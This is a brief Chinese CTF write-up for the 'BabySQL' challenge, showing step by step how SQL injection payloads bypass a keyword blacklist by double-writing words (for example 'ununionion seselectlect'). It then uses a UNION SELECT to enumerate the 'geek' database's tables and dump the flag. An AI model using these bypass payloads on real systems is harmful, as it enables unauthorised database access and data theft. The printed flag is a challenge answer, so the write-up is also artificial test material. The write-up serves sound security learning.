?username=1&password=1‘or'1'='1
一、打开,万能密码试一手,发现好像or被过滤了,尝试下去,会发现and,or,select,union,from,where等都被过滤了。
看大佬wp,用双写绕过[极客大挑战 2019]BabySQL 1
tips:双写绕过原理,代码编写过程中,只对黑名单中的内容进行空替换,但只替换一次。
?username=1' oorr '1'='1'%23&password=1
二、成功绕过,开始常见手段,猜列,猜到4时报错
三、猜注入点,2,3是
?username=1'ununionion seselectlect 1,2,3 %23&password=1
四、爆库,库名为geek
五、爆表,注意information_schema.tables里的or也被过滤了,得到两个表b4bsql,geekuser
?username=1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'%23&password=1
六、先看b4bsql表
七、看字段值,得到flag
```
Your password is ‘1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{416be82e-0025-4ea6-bf4d-2a50a4a543b2}’